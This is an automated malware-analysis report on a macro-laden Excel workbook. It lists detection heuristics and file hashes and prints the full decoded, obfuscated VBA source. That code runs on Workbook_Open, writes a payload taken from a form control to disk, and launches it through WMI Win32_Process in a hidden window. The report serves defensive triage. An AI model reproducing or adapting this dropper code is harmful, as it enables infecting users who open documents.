Malware Insights
The sample is an Office document containing VBA macros, indicated by the OOXML_VBA and OLE_VBA_WBOPEN heuristics. The Workbook_Open macro is present and uses GetObject, suggesting an attempt to execute code. The obfuscated VBA script likely aims to download and execute a second-stage payload, as suggested by the presence of 'wmic' and 'winmgmts' commands within the document body, which could be used for process execution or information gathering. The VBA code itself is heavily obfuscated, making a precise determination of its actions difficult, but the overall pattern points to a macro-based downloader.
Heuristics (5)
- VBA project inside OOXML [medium, 3 related findings] (OOXML_VBA): Document contains a VBA project — VBA macros present
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call. Matched line in script:
  `Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_`
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro [low] (OLE_VBA_WBOPEN): Workbook_Open macro. Matched line in script:
  `Private Sub Workbook_Open()`
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 8528 bytes |

SHA-256: e870803c423b1dc52bedb7606d493995be398f2d2dca52c4777f9bf4e395670b
Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 124 of 235 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
DJKIsfM = IsEmpty("pnUrq5V_FnLN3")
IsError (IsObject(sXjVpSv6qX7wX))
lMkHXSTQnOiCg = IsNumeric("DvQ1GTU")
eljv_dniL_UQC.CVaBrkzWTGgYKziQdmUOi
IsNumeric ("NEFxij_KMkINX")
IsMissing (IsObject(MfkqalCIspE))
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG"
Function oGaIrqcmOGNffeylHHAnjz()
HdvnXO = IsDate(IsArray(SDXM4HM))
DAmkNFPZL5B6 = IsArray(IsObject("xhpjXMMLa66"))
IsObject (IsDate(TwCUAI3ZINml))
oGaIrqcmOGNffeylHHAnjz = Range("GQ85")
IsDate ("b0DhM1")
IsEmpty (IsArray(L6qJNn))
DWU4zAWKTvG = IsError("n6OPz1_xbfNWm")
End Function
Function WRAdwjBDRtstP_NI()
IsError (xZTTMtV_TXkFrt)
WRAdwjBDRtstP_NI = Range("FO77")
LcBx46x = IsEmpty(D8PXYnD)
IsArray (IsNumeric(f8AP7ls08p8D))
End Function
Function qTmsJrjdhKOHCkGzt()
IsError (IsArray("DFhQr09_tHkRU"))
qTmsJrjdhKOHCkGzt = Range("EL255")
PROqcbF = IsMissing(IsNumeric(Us6zbft_CWkibO))
IsDate ("lwQnIp4E5Mh")
End Function
Attribute VB_Name = "FpjJLsQxf_dLILsYhexySzHU"
Function QZdKuofowyE_FuKFt()
IsNumeric (jcxU8L)
IsMissing ("DP0t14")
IsEmpty (IsObject(L2txbqeTh6EI))
IsNull (IsArray(FxxcNY0cbrotd))
IsObject ("U7y8rqL")
IsDate (IsEmpty(ALgW76r_4XRXCr))
Slaxri = IsObject(NH7P9Xh)
YQbQCEB_d_wSD = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.oGaIrqcmOGNffeylHHAnjz
IsMissing (IsError(Xend7HMhrasSa))
Sly7Dg = IsDate(IsNumeric(Vx0Syvf))
rT0uqa6KTZEp = IsDate(nC4FvW_W42s4e)
IsError (kmWu9hC)
C0UONe0z02mw = IsMissing(IsObject("kXvNNX1heJS"))
IsArray ("H0qXKl")
QZdKuofowyE_FuKFt = YQbQCEB_d_wSD
GEcTXj1NqK6z = IsError(IsDate(EIzIqky))
IsNull (IsError("RYEQ019"))
IsNull (IsError(J1DXJIHDlglL))
End Function
Function smvaPo_LuHKu()
IsDate ("CITFVW_q8dB81")
IsEmpty (IsObject("SzKLN9y_KY0XO"))
tepEYGZposcdkPmNbGI_g = mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.WRAdwjBDRtstP_NI
RUAUJuYnORRoLoCxYnILFGhiyKVKrJk = Range("GV180")
IsNumeric (IsNumeric("A0I3A0"))
IsNull (IsArray(MWVyaHW))
SWyxWOb = IsEmpty("IOqDTd_oJysDg")
IsEmpty (IsMissing(jX3t3Oz4wjy8))
IsMissing (IsNumeric("LQLJUS"))
FDrAHaBVgaDP = IsDate(IsDate(oy9gO7))
IsNull (IsDate("Ns2kR3_25vU90"))
IsError (IsNumeric(RGT37xK))
AHPs_MdBJewdz = NS_hiFrTA_qC.NGsSLbhckovf
smvaPo_LuHKu = RUAUJuYnORRoLoCxYnILFGhiyKVKrJk + AHPs_MdBJewdz + tepEYGZposcdkPmNbGI_g
IsDate (IsNumeric("cU1sVP_EvA0xF"))
TVL3BDy9j2J3 = IsError(UlEOZXXEjHH)
JzOmRIj = IsArray(lLNFUkvmHz8a)
End Function
Function wiBBvpqRh__zSVzPCvaMOL_euRwlS()
ei5AhlU = IsNumeric(N9oJdP_1FeN0t)
EAtnWDm = IsEmpty(ZWyD3N38KGjH0)
WwpdzarMW = ChrW(CLng((122 Xor (-5.59610705596107E-02 * (-1126 + 715#))))) _
XcQIyperjgHnYUkLwUrIQB_omKLGX = ChrW(99)
IsNumeric (IsError("ijD17qi"))
pfesCV_ALepDbpRabividywT = Chr(109) _
NfDoMCxkrMCUZuNQe_j_nFG_o = Chr(CLng((991 + (7.34645669291339 * -127))))
HOVpVKcU = ChrW(CLng((-187 + (2.91489361702128 * xlDialogUnhide))))
pQoeZlBGfQihYYjv_PGvLhBb_gDDAr = Chr(58)
LBKBBsPyeo_l_RA = ChrW(114)
IsNumeric ("ADEl1Z_auODz")
UivZG_gJBEGJHdYwaOGgrLIgyIX = Chr(105)
hrwSpbWjfYpdejHJWF = Replace("md>96md>96md>96n32_Procemd>96md>96", "md>96", "")
pyDMzuU = Chr(CLng((-579 + ((611 + 146#) - 59#))))
YStLWm_pwNQCIcJkIa = Chr(CLng((Not (-451 + 400#))))
IsError ("B4rpwdX_HWZRQ")
qprMnOaImaaASKco_psyyh_DCZAdxW = Chr(115) _
Xc_rxFjUfFKzQVSutZpRDegQ = Chr(CLng(((-610 - -422#) - -304)))
lzeAZmrnqijre = ChrW(105)
wiBBvpqRh__zSVzPCvaMOL_euRwlS = Join(Array(pyDMzuU & Chr(CLng(((-457 + 467#) Xor xlConeColClustered))) & Chr(CLng(((-224 + 299#) Xor xlRangeAutoFormatTable6))) _
& WwpdzarMW & Chr(CLng((xlHundredMillions + xlDialogDeleteFormat))) & pfesCV_ALepDbpRabividywT & Xc_rxFjUfFKzQVSutZpRDegQ & qprMnOaImaaASKco_psyyh_DCZAdxW & pQoeZlBGfQihYYjv_PGvLhBb_gDDAr & LBKBBsPyeo_l_RA & Chr(111) & ChrW(111) & ChrW(116) & Chr(92) & XcQIyperjgHnYUkLwUrIQB_omKLGX & lzeAZmrnqijre & Chr(109) & Chr(CLng((Not ((-1422 - -405#) + 898#)))) & YStLWm_pwNQCIcJkIa & NfDoMCxkrMCUZuNQe_j_nFG_o & HOVpVKcU & UivZG_gJBEGJHdYwaOGgrLIgyIX & hrwSpbWjfYpdejHJWF & NS_hiFrTA_qC.ucismXXbDEF))
ES9Jxw5 = IsArray("g2x9nPhSDALfu")
IsArray ("xDDaJhJ")
IsDate (AJkGC0uPuo53)
End Function
Function AAZJ_ixgCMsuxTjNw()
ImpFeh = IsObject("R497DO")
J1sk75plhteHI = IsArray(IsError("IXC6EBC0hN4p"))
IsObject ("PhAKdp")
kYByyrE = IsError(IsArray(WL6Lac))
r8oqpu = IsEmpty(RQ8Pjk)
biKccNhwalnlGxfNM = Range("HJ88")
B7eBCvh = IsNull(LhwBMhV_OrvZ2)
IsObject (IsEmpty(P7G4k0aCAeoV))
IsArray (IsNull(JKHgsau_G8TcN))
iYkw7w_sJEieg = IsError(IsEmpty("Lia4J6"))
StbN_CUMr_hw_GeA = Range("HZ247")
IsDate (IsDate("JcadeOl"))
AAZJ_ixgCMsuxTjNw = Join(Array(biKccNhwalnlGxfNM & StbN_CUMr_hw_GeA & mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG.qTmsJrjdhKOHCkGzt))
ZkAzC8a = IsArray(IsDate("ZM2NTH_BQyLOt"))
IsNumeric (IsDate(rNK4jhHkh5gtA))
gEfYJ9_6lL00 = IsNumeric(DpwsBGj_wODKg6)
End Function
Attribute VB_Name = "NS_hiFrTA_qC"
Attribute VB_Base = "0{AFF362B7-94F2-42CF-B067-534207BF8B96}{96D0F2CA-F860-4DEC-9DE8-BECD63BA89ED}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function NGsSLbhckovf()
IsDate ("F6pYby")
AnaOUw = IsDate("ajxl5gP")
IsArray (IsError("DDkXCRk"))
NGsSLbhckovf = Range("HL219")
IsObject ("ZWGC9GHh4uh")
IsMissing ("TgRh3c_P0HKI")
ukoKZL = IsNull("FlYibQ_XBoPV")
End Function
Function ucismXXbDEF()
IsEmpty (qfja4Qv)
ucismXXbDEF = Range("BK254")
NNSnK1 = IsNumeric(IsNumeric(iJfHnl))
U2BwNYTi9rjw = IsDate("CGMKpr")
End Function
Attribute VB_Name = "OhfmSJOBIU"
Function NVWNO_yHmgV_pzpAjrdH()
IsNumeric (IsNumeric(cdlovf))
IsNull (IsObject(uLwY8Y2))
IsEmpty (eeHuJ0FjGtwG)
Set NVWNO_yHmgV_pzpAjrdH = GetObject(FpjJLsQxf_dLILsYhexySzHU.smvaPo_LuHKu).SpawnInstance_
cYCcBtHuMMa3 = IsEmpty(IsDate("X1SNoOvu44ph"))
IsError (IsDate(ZPfhvq_XuKzFD))
IsObject (IsDate("ORPNAD_f6hXF"))
With NVWNO_yHmgV_pzpAjrdH
.ShowWindow = CLng((xlLeftBrace Or xlEPS))
End With
IsMissing (IsDate("GFeKMJ5"))
IsObject (IsEmpty("Mon3UcjmJ4R"))
Zkk2xJM8PhQ = IsNumeric(IsDate(Rk3VtoQ))
End Function
Attribute VB_Name = "eljv_dniL_UQC"
Function CVaBrkzWTGgYKziQdmUOi()
Dim C_elQEaM_fzlxQyq_OhFNIZo As String
WSKr6F = IsDate("YhIt08")
HNB4JHf = IsDate(IsArray(vF6O4Iu6sUb0u))
C_elQEaM_fzlxQyq_OhFNIZo = Replace(NS_hiFrTA_qC.sUff_NcuIfSGEerZBNFusVgwD.Text, "!s=/Cw^MNCNT", "")
IsArray (IsNumeric("SlO4ppVVpwXq"))
IsArray (IsDate("CkVJYze8wtdl6"))
KmTP5p_g1UknM = IsDate(IsDate("AIxKq9"))
Open Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt For Binary As #CLng((xlSortNormal Xor xlMicrosoftWord))
IsObject ("Zb7lMQK_p9Kul")
IsArray (Z0jRdK8_AK7KK)
Put #CLng((xlParamTypeChar And xlSourceSheet)), , C_elQEaM_fzlxQyq_OhFNIZo
WhN2o5395gTkz = IsArray(IsNumeric(HqmA5Z2pcyHz))
IsDate (CCLt9ujszujl)
Close #CLng((xlStandardSummary Or xlOLELink))
UwZeKb = IsDate(xQSNBhf_x4SgWt)
IsError ("XJdDIl3xanLoD")
hKRA_ZIYZJqlouGJs_zkg_SnH
K0XroISYwM0 = IsDate(IsObject(VEdA3NuczVd))
CWTLADq = IsArray(IsEmpty(Qb1PWJ))
End Function
Function hKRA_ZIYZJqlouGJs_zkg_SnH()
IsArray (Xjk7mWMeGLMp)
IH0bFN1 = IsArray("pfSZrz")
IsArray ("rFlYacu")
With GetObject(FpjJLsQxf_dLILsYhexySzHU.wiBBvpqRh__zSVzPCvaMOL_euRwlS)
.Create FpjJLsQxf_dLILsYhexySzHU.AAZJ_ixgCMsuxTjNw & Chr(34) & Application.ActiveWorkbook.Path & FpjJLsQxf_dLILsYhexySzHU.QZdKuofowyE_FuKFt & Chr(34), Null, OhfmSJOBIU.NVWNO_yHmgV_pzpAjrdH
End With
IsDate (IsError(NvDXHX_TgpXLG))
IsEmpty (IsDate(QgXXZXK))
PyMe5pq = IsArray(jmfQKpW)
NpFfX58_DjN57s = IsDate(IsDate(S3HIfQR))
End Function
```
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 58368 bytes |

SHA-256: 268a89195c6bb9b45a88d4d673b514818686431e21d91e0e57b2ad65e482e1a3

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 742 of 1102 identifiers look randomly generated (e.g. 'mngsrhzQPlhKTsQ_YlzcPVWrEyidFnG') — consistent with name-mangling obfuscation.